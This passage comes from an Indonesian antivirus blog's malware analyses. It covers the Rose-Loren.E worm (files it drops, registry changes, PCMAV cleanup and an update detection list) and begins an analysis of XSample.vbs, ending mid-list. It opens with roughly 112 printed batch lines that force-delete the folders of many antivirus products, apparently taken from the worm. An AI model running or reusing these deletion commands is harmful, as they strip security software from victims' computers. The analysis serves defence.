number42 index41 alt1">42</div><div class="line number43 index42 alt2">43</div><div class="line number44 index43 alt1">44</div><div class="line number45 index44 alt2">45</div><div class="line number46 index45 alt1">46</div><div class="line number47 index46 alt2">47</div><div class="line number48 index47 alt1">48</div><div class="line number49 index48 alt2">49</div><div class="line number50 index49 alt1">50</div><div class="line number51 index50 alt2">51</div><div class="line number52 index51 alt1">52</div><div class="line number53 index52 alt2">53</div><div class="line number54 index53 alt1">54</div><div class="line number55 index54 alt2">55</div><div class="line number56 index55 alt1">56</div><div class="line number57 index56 alt2">57</div><div class="line number58 index57 alt1">58</div><div class="line number59 index58 alt2">59</div><div class="line number60 index59 alt1">60</div><div class="line number61 index60 alt2">61</div><div class="line number62 index61 alt1">62</div><div class="line number63 index62 alt2">63</div><div class="line number64 index63 alt1">64</div><div class="line number65 index64 alt2">65</div><div class="line number66 index65 alt1">66</div><div class="line number67 index66 alt2">67</div><div class="line number68 index67 alt1">68</div><div class="line number69 index68 alt2">69</div><div class="line number70 index69 alt1">70</div><div class="line number71 index70 alt2">71</div><div class="line number72 index71 alt1">72</div><div class="line number73 index72 alt2">73</div><div class="line number74 index73 alt1">74</div><div class="line number75 index74 alt2">75</div><div class="line number76 index75 alt1">76</div><div class="line number77 index76 alt2">77</div><div class="line number78 index77 alt1">78</div><div class="line number79 index78 alt2">79</div><div class="line number80 index79 alt1">80</div><div class="line number81 index80 alt2">81</div><div class="line number82 index81 alt1">82</div><div class="line number83 index82 alt2">83</div><div class="line number84 index83 alt1">84</div><div class="line number85 index84 alt2">85</div><div class="line number86 index85 alt1">86</div><div class="line number87 index86 alt2">87</div><div class="line number88 index87 alt1">88</div><div class="line number89 index88 alt2">89</div><div class="line number90 index89 alt1">90</div><div class="line number91 index90 alt2">91</div><div class="line number92 index91 alt1">92</div><div class="line number93 index92 alt2">93</div><div class="line number94 index93 alt1">94</div><div class="line number95 index94 alt2">95</div><div class="line number96 index95 alt1">96</div><div class="line number97 index96 alt2">97</div><div class="line number98 index97 alt1">98</div><div class="line number99 index98 alt2">99</div><div class="line number100 index99 alt1">100</div><div class="line number101 index100 alt2">101</div><div class="line number102 index101 alt1">102</div><div class="line number103 index102 alt2">103</div><div class="line number104 index103 alt1">104</div><div class="line number105 index104 alt2">105</div><div class="line number106 index105 alt1">106</div><div class="line number107 index106 alt2">107</div><div class="line number108 index107 alt1">108</div><div class="line number109 index108 alt2">109</div><div class="line number110 index109 alt1">110</div><div class="line number111 index110 alt2">111</div><div class="line number112 index111 alt1">112</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="plain plain">del /f /q /s C:\ESET\*.* >nul</code></div><div class="line number2 index1 alt1"><code class="plain plain">del /f /q /s C:\antivi~1\*.* >nul</code></div><div class="line number3 index2 alt2"><code class="plain plain">del /f /q /s C:\antivi~2\*.* >nul</code></div><div class="line number4 index3 alt1"><code class="plain plain">del /f /q /s C:\antiviru\*.* >nul</code></div><div class="line number5 index4 alt2"><code class="plain plain">del /f /q /s C:\avg\*.* >nul</code></div><div class="line number6 index5 alt1"><code class="plain plain">del /f /q /s C:\kasper~1\*.* >nul</code></div><div class="line number7 index6 alt2"><code class="plain plain">del /f /q /s C:\kasper~2\*.* >nul</code></div><div class="line number8 index7 alt1"><code class="plain plain">del /f /q /s C:\mcafee\*.* >nul</code></div><div class="line number9 index8 alt2"><code class="plain plain">del /f /q /s C:\mcafee.com\agent\*.* >nul</code></div><div class="line number10 index9 alt1"><code class="plain plain">del /f /q /s C:\mcafee.com\*.* >nul</code></div><div class="line number11 index10 alt2"><code class="plain plain">del /f /q /s C:\mcafee.com\VSO\*.* >nul</code></div><div class="line number12 index11 alt1"><code class="plain plain">del /f /q /s C:\mcafee~1\*.* >nul</code></div><div class="line number13 index12 alt2"><code class="plain plain">del /f /q /s C:\msav\*.* >nul</code></div><div class="line number14 index13 alt1"><code class="plain plain">del /f /q /s C:\norman\*.* >nul</code></div><div class="line number15 index14 alt2"><code class="plain plain">del /f /q /s C:\norton~1\*.* >nul</code></div><div class="line number16 index15 alt1"><code class="plain plain">del /f /q /s C:\norton~2\*.* >nul</code></div><div class="line number17 index16 alt2"><code class="plain plain">del /f /q /s C:\pav\*.* >nul</code></div><div class="line number18 index17 alt1"><code class="plain plain">del /f /q /s C:\pccill~1\*.* >nul</code></div><div class="line number19 index18 alt2"><code class="plain plain">del /f /q /s C:\iolo\*.* >nul</code></div><div class="line number20 index19 alt1"><code class="plain plain">del /f /q /s C:\progra~1\ESET\*.* >nul</code></div><div class="line number21 index20 alt2"><code class="plain plain">del /f /q /s C:\progra~1\antivi~1\*.* >nul</code></div><div class="line number22 index21 alt1"><code class="plain plain">del /f /q /s C:\progra~1\antivi~2\*.* >nul</code></div><div class="line number23 index22 alt2"><code class="plain plain">del /f /q /s C:\progra~1\avg\*.* >nul</code></div><div class="line number24 index23 alt1"><code class="plain plain">del /f /q /s C:\progra~1\kasper~1\*.* >nul</code></div><div class="line number25 index24 alt2"><code class="plain plain">del /f /q /s C:\progra~1\kasper~2\*.* >nul</code></div><div class="line number26 index25 alt1"><code class="plain plain">del /f /q /s C:\progra~1\mcafee\*.* >nul</code></div><div class="line number27 index26 alt2"><code class="plain plain">del /f /q /s C:\progra~1\McAfee.com\agent\*.* >nul</code></div><div class="line number28 index27 alt1"><code class="plain plain">del /f /q /s C:\progra~1\McAfee.com\\*.* >nul</code></div><div class="line number29 index28 alt2"><code class="plain plain">del /f /q /s C:\progra~1\McAfee.com\VSO\*.* >nul</code></div><div class="line number30 index29 alt1"><code class="plain plain">del /f /q /s C:\progra~1\mcafee~1\*.* >nul</code></div><div class="line number31 index30 alt2"><code class="plain plain">del /f /q /s C:\progra~1\mindso~1\*.* >nul</code></div><div class="line number32 index31 alt1"><code class="plain plain">del /f /q /s C:\progra~1\norman\*.* >nul</code></div><div class="line number33 index32 alt2"><code class="plain plain">del /f /q /s C:\progra~1\norton~1\*.* >nul</code></div><div class="line number34 index33 alt1"><code class="plain plain">del /f /q /s C:\progra~1\norton~2\*.* >nul</code></div><div class="line number35 index34 alt2"><code class="plain plain">del /f /q /s C:\progra~1\pandas~1\*.* >nul</code></div><div class="line number36 index35 alt1"><code class="plain plain">del /f /q /s C:\Progra~1\Alwils~1\*.* >nul</code></div><div class="line number37 index36 alt2"><code class="plain plain">del /f /q /s C:\progra~1\iolo\*.* >nul</code></div><div class="line number38 index37 alt1"><code class="plain plain">del /f /q /s /a:h C:\ESET\*.* >nul</code></div><div class="line number39 index38 alt2"><code class="plain plain">del /f /q /s /a:h C:\antivi~1\*.* >nul</code></div><div class="line number40 index39 alt1"><code class="plain plain">del /f /q /s /a:h C:\antivi~2\*.* >nul</code></div><div class="line number41 index40 alt2"><code class="plain plain">del /f /q /s /a:h C:\antiviru\*.* >nul</code></div><div class="line number42 index41 alt1"><code class="plain plain">del /f /q /s /a:h C:\avg\*.* >nul</code></div><div class="line number43 index42 alt2"><code class="plain plain">del /f /q /s /a:h C:\kasper~1\*.* >nul</code></div><div class="line number44 index43 alt1"><code class="plain plain">del /f /q /s /a:h C:\kasper~2\*.* >nul</code></div><div class="line number45 index44 alt2"><code class="plain plain">del /f /q /s /a:h C:\mcafee\*.* >nul</code></div><div class="line number46 index45 alt1"><code class="plain plain">del /f /q /s /a:h C:\mcafee.com\agent\*.* >nul</code></div><div class="line number47 index46 alt2"><code class="plain plain">del /f /q /s /a:h C:\mcafee.com\VSO\*.* >nul</code></div><div class="line number48 index47 alt1"><code class="plain plain">del /f /q /s /a:h C:\mcafee~1\*.* >nul</code></div><div class="line number49 index48 alt2"><code class="plain plain">del /f /q /s /a:h C:\msav\*.* >nul</code></div><div class="line number50 index49 alt1"><code class="plain plain">del /f /q /s /a:h C:\norman\*.* >nul</code></div><div class="line number51 index50 alt2"><code class="plain plain">del /f /q /s /a:h C:\norton~1\*.* >nul</code></div><div class="line number52 index51 alt1"><code class="plain plain">del /f /q /s /a:h C:\norton~2\*.* >nul</code></div><div class="line number53 index52 alt2"><code class="plain plain">del /f /q /s /a:h C:\pav\*.* >nul</code></div><div class="line number54 index53 alt1"><code class="plain plain">del /f /q /s /a:h C:\pccill~1\*.* >nul</code></div><div class="line number55 index54 alt2"><code class="plain plain">del /f /q /s /a:h C:\pc-cil~1\*.* >nul</code></div><div class="line number56 index55 alt1"><code class="plain plain">del /f /q /s /a:h C:\iolo\*.* >nul</code></div><div class="line number57 index56 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\ESET\*.* >nul</code></div><div class="line number58 index57 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\antivi~1\*.* >nul</code></div><div class="line number59 index58 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\antivi~2\*.* >nul</code></div><div class="line number60 index59 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\avg\*.* >nul</code></div><div class="line number61 index60 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\kasper~1\*.* >nul</code></div><div class="line number62 index61 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\kasper~2\*.* >nul</code></div><div class="line number63 index62 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\mcafee\*.* >nul</code></div><div class="line number64 index63 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\mcafee.com\agent\*.* >nul</code></div><div class="line number65 index64 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\mcafee.com\*.* >nul</code></div><div class="line number66 index65 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\mcafee.com\VSO\*.* >nul</code></div><div class="line number67 index66 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\mcafee~1\*.* >nul</code></div><div class="line number68 index67 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\mindso~1\*.* >nul</code></div><div class="line number69 index68 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\norman\*.* >nul</code></div><div class="line number70 index69 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\norton~1\*.* >nul</code></div><div class="line number71 index70 alt2"><code class="plain plain">del /f /q /s /a:h C:\progra~1\norton~2\*.* >nul</code></div><div class="line number72 index71 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\pandas~1\*.* >nul</code></div><div class="line number73 index72 alt2"><code class="plain plain">del /f /q /s /a:h C:\Progra~1\Alwils~1\*.* >nul</code></div><div class="line number74 index73 alt1"><code class="plain plain">del /f /q /s /a:h C:\progra~1\iolo\*.* >nul</code></div><div class="line number75 index74 alt2"><code class="plain plain">del /f /q /s /a:R C:\ESET\*.* >nul</code></div><div class="line number76 index75 alt1"><code class="plain plain">del /f /q /s /a:R C:\antivi~1\*.* >nul</code></div><div class="line number77 index76 alt2"><code class="plain plain">del /f /q /s /a:R C:\antivi~2\*.* >nul</code></div><div class="line number78 index77 alt1"><code class="plain plain">del /f /q /s /a:R C:\antiviru\*.* >nul</code></div><div class="line number79 index78 alt2"><code class="plain plain">del /f /q /s /a:R C:\avg\*.* >nul</code></div><div class="line number80 index79 alt1"><code class="plain plain">del /f /q /s /a:R C:\kasper~1\*.* >nul</code></div><div class="line number81 index80 alt2"><code class="plain plain">del /f /q /s /a:R C:\kasper~2\*.* >nul</code></div><div class="line number82 index81 alt1"><code class="plain plain">del /f /q /s /a:R C:\mcafee\*.* >nul</code></div><div class="line number83 index82 alt2"><code class="plain plain">del /f /q /s /a:R C:\mcafee.com\agent\*.* >nul</code></div><div class="line number84 index83 alt1"><code class="plain plain">del /f /q /s /a:R C:\mcafee.com\*.* >nul</code></div><div class="line number85 index84 alt2"><code class="plain plain">del /f /q /s /a:R C:\mcafee.com\VSO\*.* >nul</code></div><div class="line number86 index85 alt1"><code class="plain plain">del /f /q /s /a:R C:\mcafee~1\*.* >nul</code></div><div class="line number87 index86 alt2"><code class="plain plain">del /f /q /s /a:R C:\msav\*.* >nul</code></div><div class="line number88 index87 alt1"><code class="plain plain">del /f /q /s /a:R C:\norman\*.* >nul</code></div><div class="line number89 index88 alt2"><code class="plain plain">del /f /q /s /a:R C:\norton~1\*.* >nul</code></div><div class="line number90 index89 alt1"><code class="plain plain">del /f /q /s /a:R C:\norton~2\*.* >nul</code></div><div class="line number91 index90 alt2"><code class="plain plain">del /f /q /s /a:R C:\pav\*.* >nul</code></div><div class="line number92 index91 alt1"><code class="plain plain">del /f /q /s /a:R C:\pccill~1\*.* >nul</code></div><div class="line number93 index92 alt2"><code class="plain plain">del /f /q /s /a:R C:\pc-cil~1\*.* >nul</code></div><div class="line number94 index93 alt1"><code class="plain plain">del /f /q /s /a:R C:\iolo\*.* >nul</code></div><div class="line number95 index94 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\ESET\*.* >nul</code></div><div class="line number96 index95 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\antivi~1\*.* >nul</code></div><div class="line number97 index96 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\antivi~2\*.* >nul</code></div><div class="line number98 index97 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\avg\*.* >nul</code></div><div class="line number99 index98 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\kasper~1\*.* >nul</code></div><div class="line number100 index99 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\kasper~2\*.* >nul</code></div><div class="line number101 index100 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\mcafee\*.* >nul</code></div><div class="line number102 index101 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\mcafee.com\*.* >nul</code></div><div class="line number103 index102 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\mcafee.com\agent\*.* >nul</code></div><div class="line number104 index103 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\mcafee.com\VSO\*.* >nul</code></div><div class="line number105 index104 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\mcafee~1\*.* >nul</code></div><div class="line number106 index105 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\mindso~1\*.* >nul</code></div><div class="line number107 index106 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\norman\*.* >nul</code></div><div class="line number108 index107 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\norton~1\*.* >nul</code></div><div class="line number109 index108 alt2"><code class="plain plain">del /f /q /s /a:R C:\progra~1\norton~2\*.* >nul</code></div><div class="line number110 index109 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\pandas~1\*.* >nul</code></div><div class="line number111 index110 alt2"><code class="plain plain">del /f /q /s /a:R C:\Progra~1\Alwils~1\*.* >nul</code></div><div class="line number112 index111 alt1"><code class="plain plain">del /f /q /s /a:R C:\progra~1\iolo\*.* >nul</code></div></div></td></tr>
</tbody></table></div></div></li>
<li>Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.<br />
<img alt="Rose-Loren.E - Image Rose" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/2.rose.PNG" title="Rose-Loren.E - Image Rose" /></li>
<li>Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.</li>
<li>Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.<img alt="Rose-Loren.E - HTML" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/3.bunga.PNG" title="Rose-Loren.E - HTML" /><img alt="Rose-Loren.E - View Source" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/4.puisi.PNG" title="Rose-Loren.E - View Source" /></li>
<li>Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.<img alt="Rose-Loren.E - Flash Disk" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/5.explorer.PNG" title="Rose-Loren.E - Flash Disk" /><img alt="Rose-Loren.E - Autorun" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/6.autorun.PNG" title="Rose-Loren.E - Autorun" /></li>
</ul><strong>D. Hasil Infeksi</strong><br />
Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:<br />
<img alt="Rose-Loren.E - Logon" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/7.logon.PNG" title="Rose-Loren.E - Logon" /><br />
Text yang dirandom adalah:<br />
<ul><li>Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.</li>
<li>Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain</li>
<li>Mahkota kemanusiaan ialah rendah hati</li>
<li>Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang</li>
<li>Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu</li>
<li>Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.</li>
<li>Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.</li>
<li>Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna</li>
<li>Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.</li>
<li>Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.</li>
<li>Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.</li>
<li>Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier</li>
<li>Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.</li>
<li>Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda</li>
<li>Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.</li>
<li>Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.</li>
<li>Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.</li>
<li>Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak</li>
<li>Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.</li>
<li>Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.</li>
<li>Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius</li>
<li>Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.</li>
<li>Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)</li>
<li>Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.</li>
<li>Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.</li>
<li>Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.</li>
<li>Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.</li>
<li>Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.</li>
<li>Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.</li>
<li>Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.</li>
<li>Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.</li>
<li>Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan</li>
<li>Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu</li>
<li>Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.</li>
<li>Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.</li>
<li>Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.</li>
</ul>Worm juga menghilangkan beberapa menu pada Folder Options.<br />
<img alt="Rose-Loren.E - Folder Options" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/8.folderoption.PNG" title="Rose-Loren.E - Folder Options" /><br />
Payload lainnya adalah merubah tampilan properties pada My Computers.<br />
<img alt="Rose-Loren.E - System" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/9.system.PNG" title="Rose-Loren.E - System" /><br />
Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.<br />
<ul><li>Regedit.exe</li>
<li>Msconfig.exe</li>
<li>taskmgr.exe</li>
<li>ntvdm.exe</li>
<li>rstrui.exe</li>
<li>EnableExtensions</li>
<li>FolderContentsInfoTip</li>
<li>NoRun</li>
<li>NoFind</li>
<li>DisableCurrentUserRun</li>
<li>HideFileExt</li>
<li>FolderSizeTip</li>
<li>ShowFullPathAddress</li>
<li>ShowFullPath</li>
<li>Disable SafeMode</li>
<li>Disable Show Hidden and Super Hidden files.</li>
</ul>Worm juga akan membuat startup dengan nama WinUp dan RsWin.<br />
<strong>E. Pembersihan</strong><br />
Mulai PCMAV 4.7 Update Build1, Rose-Loren.E beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.<br />
<img alt="Rose-Loren.E - Detected" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/rtp.PNG" title="Rose-Loren.E - Detected" width="450" /><br />
<strong>PCMAV 4.7 Update Build1</strong><br />
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build1 telah hadir dengan penambahan <strong>72 </strong> pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan <em>update</em>, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.<img alt="" src="http://virusindonesia.com/2011/02/24/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><img alt="" src="http://virusindonesia.com/2011/02/24/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><br />
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan <em>proxy</em>, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih <em>Update</em>.<br />
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:<br />
<a href="http://www.sendspace.com/file/4srsk4" target="_blank" title="SendSpace.com">SendSpace.com</a><br />
<a href="http://www33.zippyshare.com/v/83737333/file.html" target="_blank" title="ZippyShare.com">ZippyShare.com</a> (mirror)<br />
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup <strong>menimpanya</strong>. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.<br />
<strong>Daftar tambahan virus hingga PCMAV 4.7 Update Build1:</strong><br />
AlamarPica.vbs<br />
AnitaLoroaji<br />
AnitaLoroaji.inf<br />
Autoit-Cyrillic<br />
Autoit-ReplaceIcon.D<br />
Autoit-ReplaceIcon.E<br />
Autoit-ReplaceIcon.F<br />
Autoit.FD<br />
Autoit.FD.ini<br />
Autoit.FE<br />
Autoit.FE.serv<br />
Cobax.exe.C<br />
Dhoos<br />
Dhoos.dll<br />
Dhoos.url.A<br />
Dhoos.url.B<br />
Dhoos.url.C<br />
FakeAV<br />
FakeAV-Downloader.K<br />
FakeAV-Downloader.K.dat<br />
FakeAV-Downloader.K.dll.A<br />
FakeAV-Downloader.K.dll.B<br />
FakeAV-Downloader.K.dll.C<br />
FakeAV-Downloader.K.job<br />
FakeAV-Downloader.K.lnk.A<br />
FakeAV-Downloader.K.lnk.B<br />
FakeAV-Downloader.K.lnk.C<br />
FakeAV-Downloader.K.lnk.D<br />
FakeAV-Downloader.K.ref<br />
FakeAV-Downloader.K.rtf<br />
FakeAV-Downloader.K.setup<br />
FakeAV-Downloader.K.unins<br />
FakeAV-Downloader.K.url<br />
Fakhricker.vbs<br />
Gabest.B<br />
GavGent-HVM31<br />
GXRG-Snow.vbs<br />
GXRG-Snow.vbs.host<br />
GXRG-Snow.vbs.inf<br />
GXRG.vbs<br />
GXRG.vbs.inf<br />
H323<br />
H323.bat<br />
KefiUnique.vbs<br />
KefiUnique.vbs.txt<br />
KefiUnique.vbs.upd<br />
Lz32.vbs.B<br />
Lz32.vbs.C<br />
Ossep.vbs<br />
Ossep.vbs.inf<br />
Ramnit.A.Variant<br />
Ramnit.B.Variant<br />
Ramnit.C.Variant<br />
Ramnit.D.Variant<br />
Ramnit.E.Variant<br />
Ronkor.C<br />
Ronkor.C.htt<br />
Ronkor.C.txt<br />
Rose-Loren.E<br />
TripleExe<br />
TripleExe.inf<br />
VB-Shortcut-1.lnk<br />
XSample.vbs<br />
XSample.vbs.inf<br />
XSample.vbs.ini<br />
XSample.vbs.lnk.A<br />
XSample.vbs.lnk.B<br />
XSample.vbs.lnk.C<br />
XSample.vbs.lnk.D<br />
XSample.vbs.lnk.E<br />
XSample.vbs.lnk.F<br />
XSample.vbs.mp3Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-65356988835863390982011-03-21T00:45:00.000-07:002011-03-21T00:45:40.603-07:00XSample.vbs: Aku Berhasil Masuk Ke Komputer Kamu<div class="info"><span class="date"></span><span class="author"><a href="http://virusindonesia.com/author/admin/" title="Posts by admin"></a></span> </div><img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_1.jpg" title="XSample.vbs" /><br />
<b>XSample.vbs.</b> Gambar di atas adalah salah satu hasil infeksi dari salah satu malware yang kami dapatkan dengan nama XSample.vbs. Worm ini menggunakan rekayasa sosial yang cukup menarik, yaitu dengan menggunakan nama <b>FreeJAV.com_Hot-Student.avi</b> akan membuat beberapa user mengabaikannya atau malah menjalankannya. Dan hasilnya adalah file tersebut tidak akan bisa di putar layaknya file video karena file tersebut adalah file VBS.<br />
<span id="more-1394"></span><br />
<b>A. Info File</b><br />
Nama Worm : XSample.vbs<br />
Asal : Indonesia<br />
Ukuran File : 17.1 KB (17,564 bytes)<br />
Packer : ~<br />
Pemrograman : VBScript<br />
Icon : AVI<br />
Tipe : Worm<br />
<b>B. About Malware</b><br />
Seakan mengikuti tren malware tipe worm saat ini, XSample.vbs juga banyak membuat shortcut. Akan tetapi yang menarik adalah justru bukan shortcut yang dibuatnya, melainkan penyamaran yang digunakan oleh worm ini. Pada dasarnya worm ini hanyalah memotong beberapa line codenya yang setelah diteliti lebih jauh adalah line code yang biasa dijadikan signature atau teknik pendeteksian secara heuristik untuk file VBS oleh beberapa antivirus. Sebagai contoh seperti yang terlihat pada gambar di bawah ini.<br />
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_3.PNG" title="XSample.vbs" /><br />
Jarang sekali teknik pemotongan line code yang kemudian di panggil kembali digunakan oleh malware tipe worm yang dibuat dengan menggunakan bahasa pemrograman VBScript. Selain itu, dengan menggunakan parameter<b> //E:VBSCript</b> yang sama seperti Serviks.vbs.B yaitu membuat wscript.exe tetap menjalankan file vbs meskipun tidak berekstensi *.vbs. Penggunaan parameter ini adalah untuk mejalankan malware yang dihasilkan dengan ekstensi <b>.AVI</b>. Rekayasa sosial yang digunakan adalah dengan membawa kata-kata yang mengandung unsur pornografi.<br />
<b>C. Companion/File yang dibuat</b><br />
Worm XSample.vbs mengcopykan hostnya ke folder Windows dan membuat autorun di setiap drive. Selain itu membuat shortcut pada desktop dengan nama:<br />
<ul><li> Int3rn3t Xpl0r3r.lnk</li>
<li> L0g 0ff C0mput3r.lnk</li>
<li> R3st4T C0mput3r.lnk</li>
<li> Turn 0ff C0mput3R.lnk</li>
</ul>Membuat folder dengan nama “RECYCLER” di tiap drive yanbg ditemui, dan di dalamnya juga terdapat folder dengan nama “<b>um4K-r3tupm0K-3K-ku54M-l154hr3B-uk4</b>” yang jika diperhatikan membentuk sebuah kalimat :<br />
<b>um4K-r3tupm0K-3K-ku54M-l154hr3B-uk4<br />
4ku-B3rh451l-M45uk-K3-K0mput3r-K4mu<br />
Aku Berhasil Masuk Ke Komputer Kamu</b><br />
Worm ini juga membuat folder dengan nama “? Smad-Lock (Brankas Smadav) ?” yang di dalamnya terdapat file dengan nama Read Me.txt dan berisi pesan dari malware :<br />
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_2.PNG" title="XSample.vbs" /><br />
Pesan XSample.vbs juga ditunjukkan melalui sebuah file dengan nama “<b>Kedatanganku – X-5ampl3.mp3</b>” dan bukan benar-benar file MP3 melaikan file Text dan isinya adalah :<br />
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_4.PNG" title="XSample.vbs" /><br />
<b>D. Hasil Infeksi</b><br />
Tidak terlalu banyak registry yang dirubah oleh XSample.vbs, tetapi payload yang dibuatnya cukup merepotkan user yang terinfeksi malware ini.<br />
<ul><li>Mendisable File dengan nama seperti: <ol><li> 123.exe</li>
<li> 12345.exe</li>
<li> 123456.exe</li>
